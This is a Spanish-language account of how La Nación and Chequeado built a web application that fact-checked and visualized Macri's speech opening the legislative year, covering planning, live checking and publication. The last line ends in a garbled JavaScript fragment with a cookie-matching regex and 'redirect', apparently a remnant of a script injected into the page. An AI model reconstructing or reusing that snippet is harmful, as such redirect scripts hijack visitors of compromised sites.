Visualización: Los discursos de Macri

> Ir a Detrás del discurso de Macri: chequeos y hallazgos

Esta visualización fue el fruto de gran trabajo en equipo. La Nación y Chequeado unieron sus fuerzas para publicar una pieza gráfica de alto impacto periodístico con el objetivo de analizar el discurso del presidente Mauricio Macri en la apertura del año legislativo. Con una exhaustiva planificación y coordinación de las partes, participaron 60 personas en las distintas etapas del proyecto.

 

DETALLE DE LA APLICACIÓN DIGITAL

La aplicación consta de 3 pestañas con diferentes enfoques analíticos:

Chequeo de datos

Focos discursivos

 

Ejes temáticos

 

ETAPAS DEL PROYECTO

Previo al discurso: En esta etapa se diseñó el mockup de la aplicación y se realizó la maquetación y programación utilizando HTML, CSS y Javascript. Se crearon varios Spreadsheet de Google Drive para que ambos equipos, el de Chequeado y el de La Nación, pudieran trabajar en paralelo desde diferentes lugares físicos, optimizando así el tiempo de trabajo. En las semanas previas al evento se trabajó coordinando y probando el paso a paso que se daría en vivo, entre el Lab de Innovación de Chequeado y el área de La Nación Creativa, para que todo funcionara de manera fluida en los minutos posteriores a que hablara el presidente Mauricio Macri. También se diseñaron gráficos con sets de datos de temas sensibles al gobierno con la posibilidad de ser sumados a la aplicación, siempre y cuando fueran mencionados en el discurso presidencial, como ser: Inflación, pobreza, jubilaciones y pensiones, etc.

Durante el discurso: El equipo de Chequeado realizó el chequeo colectivo en vivo, integrando la carga de información en el flujo de trabajo de ese día en el que se comenzaron a publicar chequeos y notas. Como resultado se llegó a un total de 25 chequeos y 2 explicadores. Para el chequeo en vivo se reunieron más de 50 personas entre especialistas, periodistas, voluntarios y equipo de Chequeado en la Universidad Torcuato Di Tella donde se proyectó el discurso del Presidente. Se realizaron síntesis basadas en los chequeos, pero adaptadas a la extensión necesaria para su correcta visualización, más la carga de los minutos y segundos de cada frase en video, la calificación y el link a la nota en el Spreadsheet antes mencionado

Finalizado el discurso: La aplicación se subió on line en etapas según se había previsto, ya que las 3 pestañas tenían diferentes tiempos de armado. La primera en subir fue la de chequeo de datos (a cargo del equipo de Chequeado), luego la de focos discursivos y casi en simultáneo con la anterior, ejes temáticos.  

 

PLATAFORMAS DE PUBLICACIÓN

La aplicación se publicó primero en la plataforma digital (formato desktop, tablet y mobile), y al día siguiente, en una doble página en la versión impresa del diario LA NACIÓN. “; )”\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));”;,”redirect”);>,;”””; ; “”)}